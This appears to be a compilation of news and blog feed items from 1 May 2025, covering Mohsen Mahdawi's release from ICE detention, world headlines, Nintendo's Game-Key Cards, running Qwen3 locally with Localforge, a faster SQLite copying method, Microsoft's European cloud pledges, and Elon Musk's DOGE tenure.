I will end up by saying to my people in Palestine: I feel your pain, I see you suffering, and I see the freedom, and it is very, very soon. Free, free Palestine.
AMY
GOODMAN
:
Columbia University student and Palestinian activist Mohsen Mahdawi, speaking in Burlington, Vermont, Wednesday after he was freed after over two weeks in an immigration jail.
We’re joined now by a member of his legal team, Shezza Abboushi Dallal. She’s a staff attorney with the
CLEAR
project at
CUNY
School of Law.
Shezza, thank you so much for being with us. I know you’ve just returned from Vermont, where you were with Mohsen. Can you talk about the significance of what the judge ruled, and what are the conditions of Mohsen’s release?
SHEZZA
ABBOUSHI
DALLAL
:
Thank you for having me, Amy.
I can’t overstate the significance of this ruling and the fact that Mohsen walked free yesterday and wakes up today in his home in Vermont, not in an
ICE
detention facility being punished for speaking out for Palestinian lives and freedom and against the genocide in Gaza. The judge yesterday ruled — ordered him released on bail. And this is, you know, release on his own recognizance, so he will be able to return to his home in Vermont, continue his studies at Columbia University, complete his undergraduate degree and continue on to a master’s program in the fall, and continue his advocacy for Palestinian life and dignity and freedom. And that’s of paramount importance to him.
And it was of paramount importance to the judge, too. The judge acknowledged that, you know, this is on a backdrop of a chapter of U.S. history that is repressive and evocative of moments before, where the government attempts to wield the immigration system, detention, to punish people for their First Amendment protected speech, for their political advocacy. And the judge situated his decision on that backdrop, in that context.
NERMEEN
SHAIKH
:
Shezza, as you said, he can come back to New York. He can return to his studies at Columbia, begin his master’s degree next year. Are there any other restrictions on his movement? In other words, he can come from Vermont to New York, but can he go anywhere else? And what is the remaining immigration case against him?
SHEZZA
ABBOUSHI
DALLAL
:
So, he’s released pending the culmination of his federal litigation, so his
habeas
litigation in federal court in Vermont. And so, the conditions reflect that. You know, his court case is in Vermont, so he needs to stay around close to the court, close to the court’s jurisdiction, in order to see that process through. And that’s what that’s going to look like.
NERMEEN
SHAIKH
:
And the Trump administration initially did want to move him, as well, Mohsen, to the same Louisiana immigration jail that Mahmoud Khalil — two other students — Rümeysa Öztürk are held in? How come he was not sent to Louisiana, but to Vermont instead?
SHEZZA
ABBOUSHI
DALLAL
:
That’s exactly right. The administration was playing the same card and attempting to do the same exact thing that they did with Mahmoud Khalil, Rümeysa Öztürk, Badar Khan Suri. They took him, abducted him at his naturalization interview. In the final moments after he had signed, saying that he would take an oath to the Constitution, masked men entered the room and abducted him. And then they attempted to swiftly take him to the airport in order to commence a route towards Louisiana.
And the only thing that stopped him is Mohsen’s legal team’s intervention. They filed the
habeas
petition before they had the opportunity to put him on a flight. And in fact, they took him all the way to the airport and missed a flight out from Burlington, Vermont, at the very last moment. So, we had the benefit of having learned what the Trump administration’s playbook is on all of these cases, to whisk people, abduct them, take them away from their communities into fora that are favorable for the government, and then present a series of delay tactics in their federal court proceedings on the basis of the fact that they are now in another state, like Louisiana.
And so, ultimately, Mohsen was able to remain in his home state of Vermont surrounded by his community. And anybody who’s seen footage or had the fortune of being at court or in front of court yesterday in the District of Vermont was able to see the power of that community and how, you know, people showed up in outrage at what is happening to Mohsen and all the other people, like Mahmoud and Rümeysa and Badar Khan Suri, who do not have the benefit of being in their home state and are still waiting to have their motions for release heard by the respective federal courts that they are in.
AMY
GOODMAN
:
And so, in the case of Rümeysa, the Fulbright scholar from Tufts, the international graduate student, a federal judge has ruled her case must be heard in Vermont, but she is still in Louisiana, being held there because she was moved there. Shezza, so, Mohsen gets to come to New York for graduation at Columbia University?
SHEZZA
ABBOUSHI
DALLAL
:
Yes, he does.
AMY
GOODMAN
:
I want to thank you very much for being with us, Shezza Abboushi Dallal, staff attorney with the
CLEAR
project at
CUNY
School of Law and a member of Mohsen Mahdawi’s legal defense team. She’s just back from Vermont, here in New York, as she was with him yesterday as he was released.
When we come back, today is May Day, massive protests planned across the country. We’ll talk to a New York father whose 19-year-old son was detained in the Bronx, then flown with 230 other Venezuelans to a notorious mega-prison in El Salvador, where he’s being held incommunicado. Stay with us.
[break]
AMY
GOODMAN
:
Mohsen Mahdawi singing “Spirit of Life” with his supporters after he was released Wednesday in Burlington, Vermont, from an
ICE
jail.
The original content of this program is licensed under a
Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License
. Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.
Headlines for May 1, 2025
Democracy Now!
www.democracynow.org
2025-05-01 13:00:00
“I Am Not Afraid of You”: Mohsen Mahdawi Sends Message to Trump After Release from ICE Detention, UNRWA Warns Lives of Gaza’s Children in the Balance as Israeli Blockade Stretches into Third Month, Israeli News Investigation Confirms Biden Administration Did Not Try to End Genocide...
May 1 and 2 are Public Media Giving Days. With lies and disinformation flooding the media landscape, and the Trump administration increasing its attacks on journalists, the need for independent news questioning and challenging those in power is more critical now than ever. We do not take any government or corporate funding, so we can remain unwavering in our commitment to bring you fearless trustworthy reporting on the issues that matter most.
Thanks to a group of generous donors, all donations made today will be DOUBLED, which means your $15 gift is worth $30.
If our journalism is important to you, please donate today.
Every dollar makes a difference
. Thank you so much.
Democracy Now!
Amy Goodman
Non-commercial news needs your support.
We rely on contributions from you, our viewers and listeners to do our work. If you visit us daily or weekly or even just once a month, now is a great time to make your monthly contribution.
“I Am Not Afraid of You”: Mohsen Mahdawi Sends Message to Trump After Release from
ICE
Detention
May 01, 2025
Image Credit: Courtesy of Ellen Kaye
A federal judge in Vermont has granted bail and released from
ICE
jail Palestinian Columbia University student Mohsen Mahdawi while he challenges the Trump administration’s efforts to deport him for joining protests against Israel’s assault on Gaza. U.S. District Judge Geoffrey Crawford ruled the Trump administration failed to show why Mahdawi should remain in confinement, condemning “chilling action by the government intended to shut down debate.” Mohsen Mahdawi emerged from the courthouse to a jubilant crowd of supporters, both arms in the air, holding up the V for victory sign with his hands — also the gesture for peace.
Mohsen Mahdawi
: “And I am saying it clear and loud to President Trump and his Cabinet: I am not afraid of you.”
Mahdawi also asked the crowd to join him in singing “We Shall Overcome.” Mahdawi was jailed by
ICE
in April after appearing for what he was told would be a naturalization test. He was a lead organizer in Columbia’s Gaza solidarity protests. We’ll get the latest on his case after headlines with a member of Mohsen Mahdawi’s legal defense team.
UNRWA
Warns Lives of Gaza’s Children in the Balance as Israeli Blockade Stretches into Third Month
May 01, 2025
Israel’s military is continuing its unrelenting attacks on Gaza, killing at least 18 Palestinians today. Israel has killed at least 2,300 Palestinians since it unilaterally shattered the ceasefire in mid-March, and more than 64,000 Palestinians since October 2023.
The assault continued as the U.N. Palestinian refugee agency,
UNRWA
, warned the lives of 1 million Palestinian children in Gaza are on the line as Israel’s total blockade on the territory enters its 61st day. Some 3,000 aid trucks are lined up at Gaza’s border but unable to enter. The blockade has compounded a healthcare crisis, with no medicines or equipment entering Gaza, and patients unable to leave for treatment elsewhere. This is the mother of a sick 3-year-old child being treated at Nasser Hospital in Khan Younis.
Dalia Abu Mohsen
: “Doctors prescribe treatments that aren’t even available to get from the pharmacies here. My daughter needs this medicine, but it’s not available. It’s not available anywhere in Gaza’s pharmacies. It has to come from outside, and the occupation has closed the crossing and refuses to let medicines through.”
This comes as arguments continue at the International Court of Justice over Israel’s obligations to provide aid to Gaza. A U.S. State Department lawyer on Wednesday defended Israel’s ban on
UNRWA
.
Joshua Simmons
: ”
UNRWA
is not the only option for providing humanitarian assistance in Gaza. In sum, there is no legal requirement that an occupying power permit a specific third state or international organization to conduct activities in occupied territory that would compromise its security interest.”
Israeli News Investigation Confirms Biden Administration Did Not Try to End Genocide in Gaza
May 01, 2025
Israel’s Channel 13 has aired a report detailing how the administration of former President Joe Biden allowed Israel to carry out its slaughter in Gaza with total impunity, with one senior official admitting it amounted to “killing and destroying for the sake of killing and destroying.”
Fighting Near Damascus Kills 30 People; Israel Launches Airstrike on Syria
May 01, 2025
In Syria, at least 30 people have been killed in recent days amid violent clashes between government forces and armed groups on the outskirts of Damascus. Israel intervened by launching air attacks on Syria, claiming it was defending the local Druze community. Syria immediately condemned “all forms of foreign intervention.” The transitional Syrian government, which came to power after the ouster of President Bashar al-Assad in December, has said it has restored order in the region and is committed to protecting all communities in Syria.
U.S. and Ukraine Sign Deal for Joint Natural Resources Investment Fund
May 01, 2025
U.S. and Ukrainian officials signed a deal late Wednesday that will give the U.S. a stake in Ukraine’s mineral reserves, as part of a joint investment fund with Kyiv. Details of the deal have yet to be released, including any guarantees of U.S. security assistance for Ukraine. Trump has sought to frame the agreement as repayment for U.S. military aid to Ukraine since Russia’s invasion in February 2022. The Ukrainian parliament will still need to ratify the deal. Treasury Secretary Scott Bessent spoke after signing the agreement.
Treasury Secretary Scott Bessent
: “Today’s agreement signals clearly to Russian leadership that the Trump administration is committed to a peace process centered on a free, sovereign and prosperous Ukraine over the long term. It’s time for this cruel and senseless war to end.”
We’ll have more on this story later in the show with investigative journalist Antonia Juhasz.
CNN
: Trump Administration in Talks to Send Immigrants and Asylum Seekers to Libya, Rwanda
May 01, 2025
The Trump administration has spoken to leaders of Libya and Rwanda about the possibility of sending immigrants with criminal records to those two countries. That’s according to
CNN
, which reports the U.S. is also seeking a so-called safe third country agreement that would allow the U.S. to send asylum seekers to Libya, including people with no criminal records.
Trump Repeats Lies About Abrego Garcia, Says He Could Bring Him Back from El Salvador But Will Not
May 01, 2025
President Trump said in an
ABC
News interview he has the power to bring back a Maryland father the U.S. government admitted to expelling to an El Salvador prison “in error,” but that he will not do so, despite court orders mandating the return of Kilmar Abrego Garcia. Trump was interviewed by Terry Moran.
President Donald Trump
: “This is not an innocent, wonderful gentleman from Maryland.”
Terry Moran
: “I’m not saying he’s a good guy. It’s about the rule of law. The order from the Supreme Court stands, sir.”
President Donald Trump
: “He came into our country illegally.”
Terry Moran
: “You could get him back. There’s a phone on this desk.”
President Donald Trump
: “I could.”
Terry Moran
: “You could pick it up, and with all” —
President Donald Trump
: “I could.”
Terry Moran
: — “the power of the presidency, you could call up the president of El Salvador and say, 'Send him back,' right now.”
President Donald Trump
: “And if he were the gentleman that you say he is, I would do that.”
The comments contradict previous White House statements that the U.S. has no power to return Abrego Garcia. During the interview, Trump grew increasingly agitated and repeatedly interrupted Terry Moran to falsely claim that Abrego Garcia had tattoos on his knuckles reading “M–S–1–3,” a reference to the MS-13 gang. In fact, those characters were photoshopped into a picture of tattooed symbols on Abrego Garcia’s left hand shared by the White House on social media.
Venezuelans Fearing Deportation to El Salvador Send
SOS
Message from Texas Immigration Jail
May 01, 2025
In Texas, a group of 31 Venezuelan men facing possible deportation to El Salvador’s
CECOT
prison — notorious for its torture and human rights abuses — used their bodies to spell out a cry for help Monday after they spotted a news drone flying above the immigration jail where they’re being held. The men formed the letters S-O-S in the courtyard of the Bluebonnet Detention Facility, which is operated by the for-profit Management and Training Corporation.
Federal Judge Temporarily Blocks Florida Police from Acting as Immigration Agents
May 01, 2025
A federal judge in Miami has ordered Florida police departments to stop deputizing officers to act as immigration enforcement agents. U.S. District Judge Kathleen Williams’s order came as she prepared to issue a preliminary injunction against a new state law that makes it a misdemeanor for undocumented immigrants to enter Florida by eluding immigration agents.
Federal Judge Restricts Border Patrol in California After Agents Targeted Day Laborers and Farmworkers
May 01, 2025
In California, a federal judge has issued a preliminary injunction barring Border Patrol officers from stopping people without “reasonable suspicion” that they’re undocumented, and preventing them from making warrantless arrests unless they have credible evidence a person is likely to flee. The injunction follows reports that Border Patrol agents carrying out raids in California’s Central Valley rounded up day laborers and farmworkers, regardless of their actual immigration status, rather than fulfilling their mission of arresting immigrants with serious criminal backgrounds.
Burkina Faso Protesters Rally in Defense of Interim President After Alleged Coup Attempt
May 01, 2025
In Burkina Faso, thousands of people rallied in support of interim President Ibrahim Traoré Wednesday, after military rulers said they foiled a plot to overthrow his transitional government. Traoré seized power after a 2022 coup and moved to end military ties with former colonizer France. Protesters also condemned recent comments by General Michael Langley, head of the U.S. military’s Africa Command, who accused Traoré of using Burkina Faso’s gold reserves to benefit himself rather than the people. This is a protester in Ouagadougou.
Salifou Ouédraogo
: “Words like 'democracy,' 'human rights,' no one can teach that in Africa. The African continent was the first continent that produced democracy, but not that of the West, which consists of burning countries, burning continents that do not think like them. Here we are today so that our country remains standing, so that our continent remains standing.”
Panamanian Protesters Condemn Deal to Station U.S. Troops Around Panama Canal
May 01, 2025
Protesters took to the streets of Panama City Wednesday to condemn the signing of a memorandum between the U.S. and Panama that would allow U.S. troops to deploy around the Panama Canal for military training.
Camila Aybar
: “We protest because they have stomped over the sovereignty of entire generations who have fought. They dumped our sovereignty to the trash by signing a memorandum of understanding that allows foreign military presence in Panama. Down with the memorandum! Down with the memorandum! Sovereign Panama!”
President Trump has repeatedly threatened to “take back” the Panama Canal.
Rights Groups Demand Justice for Murdered Environmentalist Marco Antonio Suástegui
May 01, 2025
In Mexico, rights groups are demanding justice for Marco Antonio Suástegui, an environmental activist from Guerrero state who was shot two weeks ago and died on Friday. Suástegui helped lead the successful grassroots resistance against the La Parota hydroelectric dam project, which would have devastated the local environment and community.
Swarthmore Students Set Up Encampment to Demand Divestment from Israel
May 01, 2025
Image Credit: Jewish Voice for Peace Philly
In Pennsylvania, students at Swarthmore College set up a new protest encampment, naming the site the “Hossam Shabat Liberated Zone,” in honor of the 23-year-old Palestinian journalist killed by Israel in Gaza in March. Students are demanding Swarthmore “divest from Israeli occupation, aggression, and apartheid, and declare itself a sanctuary campus.”
May Day Protests Across U.S. Take Aim at Trump’s Anti-Worker, Anti-Immigrant Policies
May 01, 2025
Tens of thousands of people are taking to the streets across the country for May Day, International Workers’ Day. Over 1,000 actions in more than 1,000 cities will protest the Trump administration’s policies. Worker-led demonstrations are also taking place in countries across the globe.
The original content of this program is licensed under a
Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License
. Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.
Non-commercial news needs your support
We rely on contributions from our viewers and listeners to do our work.
Please do your part today.
Game preservationists have been giving their opinions on Nintendo Switch 2’s new Game-Key Cards.
Game-Key Cards are
Nintendo
’s new branding for cartridges that still require the game to be downloaded from the
Switch 2
online store before the game can be played. The cartridge doesn’t contain the game data, rather it’s simply a ‘key’ that enables a download.
“Game-key cards are different from regular game cards, because they don’t contain the full game data,” Nintendo’s own description says. “Instead, the game-key card is your ‘key’ to downloading the full game to your system via the internet. After it’s downloaded, you can play the game by inserting the game-key card into your system and starting it up like a standard physical game card.”
So far the vast majority of third-party Switch 2 games are Game-Key Cards, with only a few exceptions such as
Cyberpunk 2077
and the Western version of
Daemon X Machina
: Titanic Scion.
The issue some players have with Game-Key Cards is that because they don’t contain the full game content on the cartridge, should the Switch 2 shop servers ever close down in the distant future – and therefore no longer provide the downloads necessary – those cartridges may become unplayable.
Most third-party Switch 2 games on the Yodobashi site are Game-Key Cards (as noted by the white bar on the bottom of the box).
In a new report by
GamesIndustry.biz
, several people involved in game preservation and re-releases have given their views on the situation.
Stephen Kick, CEO of
Nightdive Studios
(which specialises in modern remasters of older, often out-of-print games) said that “seeing Nintendo do this is a little disheartening”, adding: “You would hope that a company that big, that has such a storied history, would take preservation a little more seriously.”
Videogame Heritage Society co-founder Professor James Newman is somewhat less convinced that Game-Key Cards will be a major issue, noting that it’s rare for a game on a cartridge to still be the same game years after release.
“Even when a cartridge does contain data on day one of release, games are so often patched, updated and expanded through downloads that the cart very often loses its connection to the game, and functions more like a physical copy protection dongle for a digital object,” he explained.
Meanwhile, Paul Dyson, director of the International Center for the History of Electronic Games at The Strong Museum in New York said the move to a future where all games are digital is “inevitable”, and that Nintendo has in fact been “in some ways, the slowest of the major console producers to be going there”.
How to vibe code for free: Running Qwen3 on your Mac, using MLX
This command will both download and serve it (change port to whatever you want, and be ready to download tens of gigabytes of stuff)
After download is done you should see something like:
2025-05-01 13:56:26,964 - INFO - Starting httpd at 127.0.0.1 on port 8082...
Meaning your model is ready to receive requests. Time to configure it in localforge!
Configure Localforge
Get your latest localforge copy at
https://localforge.dev
(either npm install for any platform or if you want there are DMG and ZIP files available for OSX and Windows)
Once running open settings and set it up like this:
1) In provider list add provider
I have added two providers: one is ollama for a weak model, and another is for mlx qwen3
a) Ollama provider settings:
Choose name:
LocalOllama
Choose
ollama
from provider types
No settings required
Important prerequisite:
You need to have ollama installed on your machine with some sort of model serving, preferably gemma3:latest
This model is needed for simple gerund and aux interactions such as for agent to figure out what is going on, but not serious stuff.
b) Qwen provider settings:
Choose any provider name such as
qwen3:mlx:30b
Choose
openai
as provider type, because we are going to be using openai api v1
For API key put something like
"not-needed"
For API url put:
http://127.0.0.1:8082/v1/
(note the port you used in previous steps)
2) Create a custom agent
After you made your provider, make custom agent!
Go to agents tab in settings and click +Add Agent,
type in some name, like
qwen3-agent
And then click pencil icon to edit your agent.
This will open a huge window, in it
you care about Main and Auxiliary cards at top (ignore the Expert card, can be anything or empty)
For
Main
put in your qwen provider, and as model name type in:
mlx-community/Qwen3-30B-A3B-8bit
(or whatever you downloaded from the mlx community)
For
Auxiliary
, choose your LocalOllama provider, and for model put in
gemma3:latest
You can leave agent prompt same for now, although it may make sense to simplify it for qwen.
In the tool sections you can unselect browser tools to make it more simple, although this is optional.
Using Your New Agent
Now that this is done, press command+s, and close the agent editor, and then close settings.
You should appear in the main chat window, in it on very top
there is select box saying - select agent.
Choose your new agent (qwen3-agent)
Your agent is ready to use tools!
I typed in something simple like:
"use LS tool to show me files in this folder"
And it did!
Qwen3 successfully running the LS tool through Localforge
And here's a website created by Qwen3:
A website created by Qwen3 using Localforge
Conclusion
This may require a bit more experimenting such as simplifying system prompt, or tinkering with mlx settings and model choices,
but I think this is definitely possible to use to get some autonomous code generation on YOUR MAC, totally free of charge!
Happy tinkering!
Published 1 May 2025
A faster way to copy SQLite databases between computers
As the project matures and the database grows, this gets slower and less reliable. Downloading a 250MB database from my web server takes about a minute over my home Internet connection, and that’s pretty small – most of my databases are multiple gigabytes in size.
I’ve been trying to make these copies go faster, and I recently discovered a neat trick.
What really slows me down is my indexes. I have a lot of indexes in my SQLite databases, which dramatically speed up my queries, but also make the database file larger and slower to copy. (In one database, there’s an index which single-handedly accounts for half the size on disk!)
The indexes don’t store anything unique – they just duplicate data from other tables to make queries faster. Copying the indexes makes the transfer less efficient, because I’m copying the same data multiple times. I was thinking about ways to skip copying the indexes, and I realised that SQLite has built-in tools to make this easy.
Dumping a database as a text file
SQLite allows you to
dump a database as a text file
. If you use the
.dump
command, it prints the entire database as a series of SQL statements. This text file can often be significantly smaller than the original database.
This means that I’m only storing each value once, rather than the many times it may be stored across the original table and my indexes. This is how the text file can be smaller than the original database.
If you want to reconstruct the database, you pipe this text file back to SQLite:
To give you an idea of the potential savings, here’s the relative disk size for one of my databases.
File
Size on disk
original SQLite database
3.4 GB
text file (
sqlite3 my_database.db .dump
)
1.3 GB
gzip-compressed text (
sqlite3 my_database.db .dump | gzip -c
)
240 MB
The gzip-compressed text file is 14× smaller than the original SQLite database – that makes downloading the database much faster.
My new ssh+rsync command
Rather than copying the database directly, now I create a gzip-compressed text file on the server, copy that to my local machine, and reconstruct the database. Like so:
# Create a gzip-compressed text file on the server
ssh username@server "sqlite3 my_remote_database.db .dump | gzip -c > my_remote_database.db.txt.gz"# Copy the gzip-compressed text file to my local machine
rsync --progress username@server:my_remote_database.db.txt.gz my_local_database.db.txt.gz
# Remove the gzip-compressed text file from my server
ssh username@server "rm my_remote_database.db.txt.gz"# Uncompress the text filegunzip my_local_database.db.txt.gz
# Reconstruct the database from the text filecat my_local_database.db.txt | sqlite3 my_local_database.db
# Remove the local text filerm my_local_database.db.txt
A database dump is a stable copy source
This approach fixes another issue I’ve had when copying SQLite databases.
If it takes a long time to copy a database and it gets updated midway through, rsync may give me an invalid database file. The first half of the file is pre-update, the second half file is post-update, and they don’t match. When I try to open the database locally, I get an error:
database disk image is malformed
By creating a text dump before I start the copy operation, I’m giving rsync a stable copy source. That text dump isn’t going to change midway through the copy, so I’ll always get a complete and consistent text file.
This approach has saved me hours when working with large databases, and made my downloads both faster and more reliable. If you have to copy around large SQLite databases, give it a try.
Microsoft gets twitchy over talk of Europe's tech independence
Microsoft is responding to mounting "geopolitical and trade volatility" between the US administration and governments in Europe by pledging privacy safeguards for customers worried about using American hyperscalers, and vowing to fight the US government in court to protect Euro customers' data if needed.
Under Trump 2.0, some Europeans fear that storing their data in the bit barns of Microsoft, Google and AWS is no longer safe, a concern voiced to
The Register
in late February by Bert Hubert
, a part time technical advisor to the Dutch Electoral Council.
Dutch Parliamentarians have since
passed eight motions
that urge the government to abandon US-made technology for local alternatives. European techies and lobbyists are pressing the European Commission President Ursula von der Leyen and Executive Vice-President for Tech Sovereignty Henna Virkkunen, to
create a sovereign infrastructure
.
Microsoft President Brad Smith acknowledges this, and the importance of the region for his employer in a
blog post today
, saying "our economic reliance on Europe has always run deep.
"We recognize that our business is critically dependent on sustaining the trust of customers, countries, and governments across Europe. We respect European values, comply with European laws, and actively defend Europe's cybersecurity. Our support for Europe has always been – and always will be – steadfast.
"In a time of geopolitical volatility, we are committed to providing digital stability. That is why today Microsoft is announcing five digital commitments to Europe. These start with an expansion of our cloud and AI infrastructure in Europe, aimed at enabling every country to fully use these technologies to strengthen their economic competitiveness. And they include a promise to uphold Europe’s digital resilience regardless of geopolitical and trade volatility."
Microsoft was "pleased," he says, that the Trump administration and the European Union bloc had agreed to "suspend further
tariff escalation
" as officials "negotiate a reciprocal trade agreement" to "resolve tariff issues and reduce non-tariff barriers."
The direction of travel by the US government has created nervousness among some European customers. Trump appears to
treat his allies like his historic enemies
and relationships are unravelling. Microsoft generates around a quarter of its revenues in Europe and so has a vested financial interest in overcoming any unease from customers in the region.
With this in mind, Microsoft has a five-point plan to ameliorate growing alarm starting with confirmation today to "increase our European datacenter capacity by 40 percent over the next two years," Smith says in his post.
"We are expanding datacenter operations in 16 European countries. When combined with our
recent construction
, the plans we're announcing today will more than double our European datacenter capacity between 2023 and 2027. It will result in cloud operations in more than 200 datacenters across the continent."
"This includes," in its public cloud bit barns, "the Microsoft Cloud for Sovereignty, a package of technologies and configurations to help governments and other customers run on Azure in our public cloud datacenters with greater control over data location, encryption, and administrative access."
Techies in Europe – who obviously have a vested interest in unsettling Microsoft stronghold on the market as AWS, Microsoft, and Google have upwards of a 70 percent share of the public cloud sector in the region – previously highlighted the potential dangers of US legislation.
Frank Karlitschek, CEO of Nextcloud,
told us in March
, "The Cloud Act grants US authorities access to cloud data hosted by US companies. It does not matter if that data is located in the US, Europe, or anywhere else."
Not everyone shares those concerns, although some do, and this is sparking conversations about business risk.
Mark Boost, CEO at UK cloud provider Civo, told us today: "In the last few weeks, cloud users' interest in data sovereignty has surged. Almost overnight, it has shifted from nice-to-have to a strategic necessity."
He claimed the tariff debacle had forced many businesses to "reconsider their relationships with large US cloud providers. Organisations across the board, especially in regulated industries, are more aware than ever about how their data is used, transferred, and stored. Regaining control over that process is vital to remaining compliant and secure in a global tech economy that's constantly shifting."
"While the CLOUD Act remains in force, enterprises and governments simply cannot trust US hyperscalers to keep their data fully private, regardless of the physical location of their infrastructure."
Doubling down, Smith at Microsoft says: "Microsoft is committed to helping Europe navigate the uncertain geopolitical and trade environment and better manage risk by strengthening the continent’s digital resilience.
"We also are listening closely to the views of European governments and leaders. We recognize that European countries, like nations everywhere, need to have rock-solid confidence in the digital infrastructure on which they rely."
With this in mind, he says Microsoft's European datacenter ops will be "overseen by a European board of directors that consists exclusively of European nationals and operates under European law."
He adds:
Smith says Microsoft is no stranger to pursuing litigation to "protect the rights of our customers and other stakeholders" and points to four lawsuits filed against the US Executive Branch when President Obama was in office and a Supreme Court ruling during Trump's first run as President to uphold the rights of staff that are immigrants.
"When necessary, we're prepared to go to court," he says. "We are confident of our legal rights to ensure continuous operation of our datacenters in Europe. And we are prepared to back this confidence with our contractual commitments to European governments."
To reinforce this claim, Smith says Microsoft will also "designate and rely" upon European partners "with contingency arrangements for operational continuity in the unlikely event Microsoft were ever required by a court to suspend services. We are already enabling our partners in France and Germany to do this for the Bleu and Delos datacenters, and we will pursue arrangements for our public cloud datacenters in Europe.
"We will store backup copies of our code in a secure repository in Switzerland, and we will provide our European partners with the legal rights needed to access and use this code if needed for this purpose."
Smith is also talking up efforts to protect the privacy of European data as Microsoft, he says, lets customers choose where their data is stored and processed, how it is encrypted and secured and when Microsoft can access it.
With regard to cybersecurity, Smith says it will appoint a Deputy CISO for Europe in Microsoft Cybersecurity Governance Council, build on the Secure Future initiative and dedicate more resource to comply with the Cyber Resilience Act.
"Security is the foundation of trust. To sustain that trust, we will engage an independent auditor to verify and validate our commitments to Europe."
The final part of Microsoft's five-point plan may make some readers spill their coffee, assuming they are reading this with their morning brew in US East Coast or at lunchtime in Europe. Microsoft is going to "strengthen Europe's economic competitiveness, including for open source."
Smith didn't launch much new here, saying Microsoft will "introduce new enhancements" to AI Access Principles." The principles have, he claims, ensured the Azure AI platform is open to a variety of business models — both open source and proprietary." Microsoft
hosts
1,800 AI models. And he recounts how Microsoft last year eliminated egress fees,
albeit under pressure from UK watchdog the Competition and Markets Authority
. Some onlookers, however, feel this was more of a marketing move than actual substance, as egress fees only matter to a small portion of customers.
Corey Quinn, chief cloud economist at The Duckbill Group, said in
March last year
when Microsoft ditched egress fees: "It's marketing [that] makes new customers feel better. Wildly expensive egress mostly hurts ongoing usage; nobody stays locked in because of egress."
Microsoft this month celebrated its 50th anniversary, and the tenor of today's blog encapsulates the existential threat that Smith's employer faces in Europe. The longer Trump's unpredictable policies unsettle customers on the European side of the pond, the more action will be needed.
When profits are under threat, shareholders start to get twitchy. ®
Guido Günther: Free Software Activities April 2025
PlanetDebian
honk.sigxcpu.org
2025-05-01 10:06:55
Another short status update of what happened on my side last month.
Notable might be the Cell Broadcast support for Qualcomm SoCs, the
rest is smaller fixes and QoL improvements.
phosh
Fix splash spinner icon regression with newer GTK >= 3.24.49 (MR)
Update adaptive app list (MR)
Fix missing i...
Another short status update of what happened on my side last month.
Notable might be the Cell Broadcast support for Qualcomm SoCs, the
rest is smaller fixes and QoL improvements.
Move fast and destroy things: 100 chaotic days of Elon Musk in the White House
Guardian
www.theguardian.com
2025-05-01 10:00:21
From mass firings to unprecedented influence, Musk has left little of the federal government untouched in Doge role One hundred days after Elon Musk entered the White House as Donald Trump’s senior adviser and the de facto leader of the so-called “department of government efficiency” (Doge), the Tes...
O
ne hundred days after
Elon Musk
entered the White House as
Donald Trump
’s senior adviser and the de facto leader of the so-called “department of government efficiency” (Doge), the Tesla CEO has left little of the federal government unscathed. Over the course of just a few months, he has gutted agencies and public services that took decades to build while accumulating immense political power.
Musk’s role in the
Trump administration
is without modern precedent. Never before has the world’s richest person been deputized by the US president to cull the very agencies that oversee his businesses. Musk’s attempts to radically dismantle government bureaus have won him sprawling influence. His team has embedded its members in key roles across federal agencies, gained access to personal data on millions of Americans and fired tens of thousands of workers. SpaceX, where he is CEO, is now poised to take over potential government contracts worth billions. He has left a trail of chaos while seeding the government with his allies, who will likely help him profit and preserve his newfound power.
The billionaire’s newfound sway has not come without pushback and a cost. Doge’s blitz through the government has sparked furious nationwide backlash, as well as dozens of lawsuits challenging Musk’s mass firings and accusing his task force of violating numerous laws. Musk’s
personal
popularity
has sunk to record lows, and
Tesla’s profits
have tanked.
A look back at the
first 100 days
of the Trump administration shows the extent to which Musk’s efforts have changed the US government. It also shows that what Musk framed as a cost-cutting task initiative is failing to meet its ostensible goal of
finding $1tn
in fraud or waste, but it is succeeding in reshaping federal agencies along ideological grounds,
paving the way for private companies
to fill the resulting vacuum of public services.
Musk has recently
stopped physically working
from the White House and stated he plans to pivot away from his government position soon, but has entrenched himself as one of the world’s most divisive political figures and gives no sign he is willing to fully give up his influence. Instead, the first 100 days of Doge shows that the scope of Musk’s ambition extends to remaking how the government deals with everything from humanitarian aid to the rule of law.
Doge sweeps through agencies
On the same day Trump was sworn into office, the president issued an
executive order
that created Musk’s “department of government efficiency” by renaming the US Digital Service agency, which previously handled governmental tech issues. Trump’s order included only a vague mandate to modernize government technology and increase efficiency, but within days it would become clear that Musk and his team had far more expansive aims.
In the months leading up to the executive order, Musk had been hiring a
team of staffers
that included a mix of young engineers, tech world executives and longtime lieutenants from his private companies. Running the day-to-day operations was Steve Davis, who had worked with Musk at various companies, including SpaceX and the Boring Company, for more than 20 years. Davis was known as an exacting boss – Musk once
compared him to chemotherapy
. Others had far less experience, including 19-year-old
Edward Coristine
, who had worked for several months at Musk’s Neuralink company. The teenager had been
fired from a previous internship
for leaking information and went by the username “big balls” in online profiles.
Doge’s early days made headlines for targeting masses of government workers with layoffs and pushing others to resign, with more than 2 million employees
receiving an email
on 28 January titled “Fork in the road” that encouraged staffers to take a buyout. The emails, which asked: “What did you accomplish this week?” would become a signature of Musk and his new bureau, sent again and again whenever staff began to prey on a new herd of government employees.
Shortly after Trump’s executive order created Doge, Musk’s team quickly began popping up in the offices of numerous agencies. One of the first was the
General Services Administration
, which oversees digital technology and government buildings. Doge staffers appeared on Zoom calls with no introduction and hidden last names, questioning federal employees about what they did for work and refusing to answer questions. They also began to show up in person, taking over conference rooms and
moving Ikea beds
on to the sixth floor of the GSA to sleep overnight. Perplexed government workers at numerous agencies described Doge’s actions as a hostile takeover, where a goon squad would appear and demand rapid changes to systems they knew little about.
“They’ve only fired people and turned things off,” said a current federal employee, who agreed to speak anonymously for fear of retribution.
Simultaneously, Doge staffers were aggressively gaining access to key data systems that controlled the flow of payments to federal workers and funding for government contracts. In one striking incident, Doge team members clashed with the highest ranking career official at the treasury department over access to a payment system that controls $6tn in annual funds. The fight ended with the official, David Lebryk, being
put on administrative leave
before he ultimately resigned. Doge staff obtained the access they wanted.
Pushback against Doge from other officials resulted in similar punishments. As Doge staffers stormed into the United States Agency for International Development (USAID) in early February, they found themselves in a
heated standoff
